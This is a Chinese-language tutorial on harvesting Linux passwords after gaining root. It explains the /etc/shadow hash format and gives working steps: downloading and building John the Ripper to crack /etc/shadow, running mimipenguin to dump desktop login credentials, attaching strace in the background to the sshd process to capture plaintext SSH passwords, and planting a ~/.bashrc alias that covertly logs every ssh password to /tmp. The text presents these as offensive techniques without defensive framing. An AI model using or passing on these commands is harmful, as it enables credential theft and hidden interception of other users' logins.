首先了解下linux系统密码的构成。以root权限下发cat /etc/shadow,用户名之后的第两个冒号之间是密码。密码由三部分组成。第一部分，前两个$符之间是加密方式，其中1代表是MD5加密，5代表SHA256加密，6代表SHA512加密。第二部分，后两个$之间是盐值。第三部分，第三个$之后为密码。 import crypt
crypt.crypt(“123456″,”$6$OUTBBPMJTt6hAVqy”)

暴力破解

john解密

#安装及编译john
wget https://www.openwall.com/john/k/john-1.9.0.tar.gz
tar -zxvf john-1.9.0.tar.gz
cd john-1.9.0/src
mske&&make clean linux-x86-64
cd ../run

#运行john
./john /etc/shadow

神器mimipenguin

mimipenguin的创意来自windows凭证抓取神器mimikatz,用来从当前 Linux 桌面用户转储登录凭证（用户名和密码）.需要以root权限运行。

下载地址

文件夹中有两个脚本mimipenguin.py和mimipenguyin.sh两个脚本支持的服务范围不同。下图中，X<表示完全支持，~表示有已知bug。

支持的系统：

以root权限运行脚本：./mimipenguin.sh,成功抓取到密码。

strace工具

strace是一款Linux下的程序调试和跟踪工具，用来跟踪程序的系统调用。 首先查看sshd进程的pid：ps -elf |grep sshd

使用nohup strace -f -p 894 -o sshd.passwd.txt &跟踪进程，其中，nohup 英文全称 no hang up（不挂起），用于在系统后台不挂断地运行命令，退出终端不会影响程序的运行。”&”将命令放入后台。两者一般一起使用。
当用户使用ssh连接到服务器后，下载sshd.passwd.txt文件，可搜索read(number, “\f\0\0\0\找到密码明文。

alias命令

vi ~/.bashrc[当前用户] 或者 vi /etc/bashrc[所有用户]
添加： alias ssh=’strace -o /tmp/sshpwd-`date ‘+%d%h%m%s’`.log -e read,write,connect -s 2048 ssh’
source .bashrc使配置生效。
使用su、sudo、scp等命令也可以